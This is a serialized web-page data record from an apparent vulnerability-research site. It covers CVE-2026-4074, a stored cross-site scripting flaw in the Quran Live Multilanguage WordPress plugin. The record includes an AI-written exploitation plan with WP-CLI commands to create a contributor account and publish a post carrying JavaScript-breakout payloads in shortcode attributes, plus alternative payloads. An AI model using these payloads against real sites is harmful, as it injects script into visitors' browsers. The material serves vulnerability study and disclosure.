[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fzI9jMGhiBz_cP3HhmbDyVKouXjrUijrw9H5ayU5D8H4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":24,"research_started_at":25,"research_completed_at":26,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":27},"CVE-2026-4074","quran-live-multilanguage-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","Quran Live Multilanguage \u003C= 1.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The Quran Live Multilanguage plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cheikh' and 'lang' shortcode attributes in all versions up to, and including, 1.0.3. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes. The quran_live_render() function of quran-live.php receives shortcode attributes and passes them directly through shortcode_atts() and extract() without any sanitization. These values are then passed to Render_Quran_Live::render_verse_quran_live() where they are echoed directly into inline \u003Cscript> blocks using PHP short tags (\u003C?=$cheikh;?> and \u003C?=$lang;?>) at lines 191, 216, 217, 245, and 246 of Class_QuranLive.php. Since the output occurs inside a JavaScript context within \u003Cscript> tags, an attacker can break out of the JavaScript string and inject arbitrary script code. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","quran-live",null,"\u003C=1.0.3","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-21 19:06:14","2026-04-22 07:45:39",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F883484dd-d48d-46f9-ae96-223626c50039?source=api-prod",[],"researched",false,3,"# Research Plan: CVE-2026-4074 - Quran Live Multilanguage Stored XSS\n\n## 1. Vulnerability Summary\nThe **Quran Live Multilanguage** plugin (\u003C= 1.0.3) is vulnerable to Stored Cross-Site Scripting (XSS) via the `cheikh` and `lang` attributes of its shortcode. The `quran_live_render()` function in `quran-live.php` fails to sanitize these attributes after extracting them via `shortcode_atts()`. These unsanitized values are subsequently passed to `Render_Quran_Live::render_verse_quran_live()` in `Class_QuranLive.php`, where they are echoed directly into inline `\u003Cscript>` blocks using PHP short tags (`\u003C?=$cheikh;?>` and `\u003C?=$lang;?>`). Because the values are placed inside a JavaScript context without escaping, an authenticated attacker with Contributor-level permissions (who can create posts containing shortcodes) can inject arbitrary JavaScript that executes in the browser of anyone viewing the post.\n\n## 2. Attack Vector Analysis\n- **Authentication Level:** Contributor or higher (any role capable of creating\u002Fediting posts and using shortcodes).\n- **Vulnerable Component:** Shortcode rendering logic.\n- **Vulnerable Attributes:** `cheikh` and `lang`.\n- **Payload Placement:** The malicious payload is placed within the attributes of the `[quran-live]` shortcode (exact shortcode name to be verified, inferred as `quran-live`).\n- **Execution Context:** Inline `\u003Cscript>` tags within the HTML frontend.\n\n## 3. Code Flow\n1. **Entry Point:** A user with Contributor permissions saves a post containing a shortcode: `[quran-live cheikh=\"\u003CPAYLOAD>\" lang=\"\u003CPAYLOAD>\"]`.\n2. **Registration:** The plugin registers a shortcode handler (likely `quran_live_render`) via `add_shortcode('quran-live', 'quran_live_render')`.\n3. **Processing:** When the post is viewed, WordPress calls `quran_live_render($atts)`.\n4. **Unsafe Extraction:** `quran_live_render()` calls `shortcode_atts()` and then `extract($atts)`, creating local variables `$cheikh` and `$lang` containing the raw payload.\n5. **Vulnerable Sink:** These variables are passed to `Render_Quran_Live::render_verse_quran_live($cheikh, $lang, ...)`.\n6. **Output:** Inside `Class_QuranLive.php` (lines 191, 216, 217, 245, 246), the code uses PHP short tags to echo these variables inside JavaScript blocks:\n   ```javascript\n   var some_js_variable = '\u003C?=$cheikh;?>';\n   ```\n7. **Execution:** The browser interprets the injected JS breakout (e.g., `';alert(1)\u002F\u002F`).\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability does not require a specific plugin-defined nonce for exploitation because the \"storage\" phase uses the standard WordPress post creation\u002Fediting flow. \n\n1. **Post Creation:** Contributors use the standard `wp-admin\u002Fpost-new.php` or the REST API to save posts. This is protected by standard WordPress nonces, which are automatically handled by the browser\u002Fagent session when creating a post.\n2. **Rendering:** There is no nonce required to view a published post or a preview of a post.\n\n## 5. Exploitation Strategy\n\n### Step 1: Create a Contributor User\nUse WP-CLI to create a user with the contributor role.\n```bash\nwp user create attacker attacker@example.com --role=contributor --user_pass=password123\n```\n\n### Step 2: Create a Malicious Post\nThe contributor creates a post containing the malicious shortcode. We will target the JavaScript string context.\n\n**Payloads:**\n- For `cheikh`: `';alert(document.domain);var x='`\n- For `lang`: `';alert('XSS_LANG');var y='`\n\n**Exploit Request (via `http_request` or `browser_navigate`):**\nThe agent will log in as the contributor and create a post. However, for a PoC, `wp post create` is more efficient to establish the \"Stored\" state.\n\n```bash\nwp post create --post_type=post --post_status=publish --post_title=\"Quran Live Test\" --post_author=$(wp user get attacker --field=ID) --post_content='[quran-live cheikh=\"\\\";alert(document.domain)\u002F\u002F\" lang=\"\\\";alert(1)\u002F\u002F\"]'\n```\n*(Note: Escaping quotes in the CLI command is critical; the goal is to get `[quran-live cheikh=\"';alert(document.domain)\u002F\u002F\"]` into the database).*\n\n### Step 3: Trigger the XSS\nNavigate to the newly created post as an administrator or anonymous user to trigger the execution.\n\n```javascript\n\u002F\u002F Example browser_navigate target\nconst postUrl = await page.evaluate(() => {\n    return document.querySelector('a[rel=\"bookmark\"]').href; \u002F\u002F or use wp-cli to get the permalink\n});\n```\n\n## 6. Test Data Setup\n1. **Plugin Activation:** Ensure `quran-live` is installed and activated.\n2. **Post Content:** Use the shortcode `[quran-live]`.\n3. **Shortcode Name Verification:** If `quran-live` is not the shortcode, grep the source: `grep -r \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fquran-live\u002F`.\n\n## 7. Expected Results\nWhen the page is rendered, the HTML source at `Class_QuranLive.php:191` (and other lines) should look like this:\n```html\n\u003Cscript>\n    \u002F\u002F ... internal plugin JS ...\n    var someVar = \"\";alert(document.domain)\u002F\u002F\";\n\u003C\u002Fscript>\n```\nThe browser will execute the `alert(document.domain)` command.\n\n## 8. Verification Steps\n1. **Database Check:** Verify the shortcode is stored correctly in `wp_posts`.\n   ```bash\n   wp db query \"SELECT post_content FROM wp_posts WHERE post_title='Quran Live Test'\"\n   ```\n2. **Frontend Inspection:** Use `http_request` to fetch the post content and check for the injected script tag.\n   ```bash\n   # Look for the breakout pattern in the response\n   grep -C 5 \"alert(document.domain)\" response_body.html\n   ```\n3. **Execution Check:** Use `browser_navigate` and check for an alert dialog or a specific side effect (like a `console.log` or a global variable being set).\n\n## 9. Alternative Approaches\nIf the plugin attributes are not inside quotes (unlikely for JS variables), the payload would be simpler:\n- **Payload (No quotes):** `alert(1)`\n- **Payload (Inside function call):** `1);alert(1);(`\n\nIf the shortcode requires specific setup to render (like a specific post meta), we may need to use `wp post generate` or `wp post-meta set` to satisfy `quran_live_render`'s logic.\n\n**Grep search for exact JS context:**\n```bash\ngrep -n \"\u003C?=$cheikh;?>\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fquran-live\u002FClass_QuranLive.php\n```\nThis will confirm if we need to break out of single quotes `'`, double quotes `\"`, or a template literal `` ` ``.","gemini-3-flash-preview","2026-04-27 14:01:20","2026-04-27 14:01:42",{"type":28,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":29},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquran-live\u002Ftags"]